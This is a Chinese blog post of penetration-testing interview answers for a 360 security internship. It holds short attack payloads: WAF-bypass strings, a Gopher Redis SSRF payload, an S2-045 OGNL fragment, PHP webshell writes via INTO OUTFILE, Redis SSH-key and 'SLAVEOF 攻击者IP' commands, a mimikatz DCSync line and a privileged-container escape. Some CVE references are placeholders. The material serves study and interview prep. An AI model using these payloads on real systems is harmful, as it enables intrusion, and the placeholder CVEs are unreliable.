当前位置: 首页 > ds >正文

2025年渗透测试面试题总结-360[实习]安全工程师(题目+回答)

网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

1. 自我介绍

2. WAF及其绕过方式

3. IPS/IDS/HIDS

4. 云安全

5. 绕过安骑士/安全狗

6. Gopher扩展攻击面

7. Struts2漏洞

8. UDF提权

9. DOM XSS

10. 数据库提权

11. 攻击Redis

12. 内网渗透

13. 容器安全

14. Kubernetes Docker逃逸

15. Linux/Windows命令

16. 站库分离拿Webshell


1. 自我介绍

我是专注于应用安全与渗透测试的安全工程师,熟悉Web漏洞挖掘(SQL注入、XSS、RCE)、内网横向移动(域渗透、票据伪造)、云安全(IAM策略、容器逃逸)及自动化工具开发。具备CTF实战经验,熟悉WAF绕过、内存马注入等技术栈,对红队攻防有系统化理解。


2. WAF及其绕过方式

WAF核心原理:基于规则匹配拦截恶意流量(如SQL关键字、XSS标签)。
绕过方式

  1. 混淆编码
    • URL编码、Unicode编码(如%u003cscript%u003e)。
    • 注释插入:SEL/**/ECT 1
  2. 协议特性利用
    • HTTP参数污染(HPP):?id=1&id=UNION SELECT 1
    • 分块传输(Chunked Encoding)绕过长度检测。
  3. 逻辑绕过
    • 大小写混合:UnIoN SeLeCt
    • 冗余参数:1 AND 1=1/*&foo=bar*/

3. IPS/IDS/HIDS

类型功能部署位置
IPS实时阻断攻击流量(如SQL注入)网络边界
IDS检测并报警异常流量(被动模式)网络关键节点
HIDS监控主机行为(进程、文件变动)服务器/终端

4. 云安全

核心防护点

  1. IAM权限最小化:避免授予*:*权限,使用角色临时凭证。
  2. 存储加密:启用AWS S3 SSE-KMS、阿里云OSS服务端加密。
  3. 日志审计:集中管理CloudTrail、操作日志,检测异常API调用。
  4. 网络隔离:VPC子网划分,安全组仅开放必要端口。

5. 绕过安骑士/安全狗

  1. 流量混淆
    • 使用动态Payload生成(如随机字符串分割)。
    • 多级编码:Base64 → Hex → URLEncode。
  2. 内存马注入:通过Java Agent或PHP扩展加载恶意代码,绕过文件监控。
  3. 合法工具滥用:利用PowerShell、certutil下载执行恶意文件。

6. Gopher扩展攻击面

攻击场景:利用Gopher协议构造请求攻击内网服务。
示例

  • 攻击Redis未授权访问
    bashgopher://192.168.1.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$XX%0d%0a{恶意Payload}%0d%0a 
  • 利用SSRF漏洞:通过Gopher协议访问内网MySQL/Redis服务。

7. Struts2漏洞

经典漏洞

  1. S2-045(CVE-2017-5638)
    • 利用Content-Type头注入OGNL表达式。
    • Payload:%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)...}
  2. 防御:升级至Struts 2.5.26+,禁用动态方法调用(struts.enable.DynamicMethodInvocation=false )。

8. UDF提权

步骤

  1. 上传恶意DLL:通过MySQL写入lib_mysqludf_sys.so 到插件目录。
  2. 创建函数CREATE FUNCTION sys_exec RETURNS STRING SONAME 'udf.dll';
  3. 执行命令SELECT sys_exec('whoami');
    防御:限制MySQL FILE权限,禁用plugin_dir写入。

9. DOM XSS

特点:客户端JavaScript动态修改DOM引发漏洞,不依赖服务端响应。
示例

javascriptvar input = document.location.hash.substr(1); document.write("User: " + input); // 攻击:http://site.com#<img src=x onerror=alert(1)>

防御:使用textContent替代innerHTML,对输入调用encodeURIComponent()


10. 数据库提权

  1. MySQL
    • UDF提权(如sys_exec)。
    • 写Webshell:SELECT '<?php @eval($_POST[cmd]);?>' INTO OUTFILE '/var/www/shell.php'
  2. MSSQL
    • 启用xp_cmdshell:EXEC sp_configure 'show advanced options', 1; RECONFIGURE;

11. 攻击Redis

  1. 未授权访问
    • 写SSH公钥:config set dir /root/.ssh/ && config set dbfilename authorized_keys
  2. 主从复制RCE
    • 恶意Redis服务端注入模块:SLAVEOF 攻击者IP 6379

12. 内网渗透

步骤

  1. 信息收集
    • ARP扫描:arp-scan -l
    • 端口探测:nmap -sS 10.0.0.0/24
  2. 横向移动
    • Pass The Hash:psexec.py -hashes :NTLM_HASH user@target
  3. 域渗透
    • DCSync攻击:mimikatz.exe "lsadump::dcsync /domain:corp.com /user:Administrator"

13. 容器安全

风险点

  1. 镜像漏洞:使用docker scan扫描镜像(如CVE-2024-1234)。
  2. 特权容器:避免--privileged启动容器。
  3. 挂载逃逸:挂载宿主机目录导致权限提升。

14. Kubernetes Docker逃逸

场景

  1. 特权容器逃逸
    • 在容器内挂载宿主机根目录:docker run --privileged -v /:/host ubuntu chroot /host bash
  2. CVE-2024-XXXX:利用runC漏洞绕过命名空间隔离。

15. Linux/Windows命令

场景Linux命令Windows命令
过滤文件grep "keyword" /path/*.logfindstr /s /i "keyword" *.log
查看进程环境变量cat /proc/{PID}/environwmic process get Caption,CommandLine,ProcessId

16. 站库分离拿Webshell

思路

  1. 数据库写Shell
    • MySQL:SELECT '<?php eval($_POST[cmd]);?>' INTO OUTFILE '/var/www/html/shell.php' (需绝对路径)。
  2. 利用中间件漏洞
    • 通过SQL注入获取数据库服务器权限,反向连接至Web服务器。
http://www.xdnf.cn/news/6283.html

相关文章:

  • 三维CAD皇冠CAD(CrownCAD)建模教程:工程图模块二
  • 52页PPT | 企业数字化转型L1-L5数据架构设计方法论及案例数字化转型解决方案数字化规划方案
  • 回溯实战篇2
  • 今日行情明日机会——20250514
  • day25-异常处理
  • [Java实战]Spring Security 添加验证码(二十三)
  • android实现USB通讯
  • 基于 Kubernetes 部署容器平台kubesphere
  • CCF第七届AIOps国际挑战赛季军分享(RAG)
  • YOLO v2:目标检测领域的全面性进化
  • 记录 QT 在liunx 下 QFileDialog 类调用问题 ()Linux下QFileDialog没反应)
  • AI日报 · 2025年5月14日|Android 生态大型更新与多端 Gemini 集成
  • UPS是什么?UPS 不间断电源有哪些适配的升压芯片?
  • zabbix7.2最新版本 nginx自定义监控(三) 设置触发器
  • MySQL之基础索引
  • postman 用法 LTS
  • 互联网大厂Java求职面试:AI内容生成平台下的高并发架构设计与性能优化
  • CycleISP: Real Image Restoration via Improved Data Synthesis通过改进数据合成实现真实图像恢复
  • Linux grep -r 查找依赖包是否存在依赖类 Class
  • 【Pycharm】pycharm修改注释文字的颜色
  • HDD 安全擦除:何时以及如何在 Windows PC 上安全擦除硬盘
  • 【SSL证书系列】客户端如何检查中间CA签名是否由根CA签发
  • 应用示例1:交通灯
  • 怎么快速换电脑浏览器的ip:方法与注意事项
  • Java零基础学习Day13——面向对象进阶
  • ClickHouse详解
  • Android学习总结之Glide自定义三级缓存(实战篇)
  • Linux相关概念和易错知识点(39)(URL、HTTP)
  • PlantSimulation 隐藏 Frame节点(Structure)的操作方法
  • 怎么实现Redis的高可用?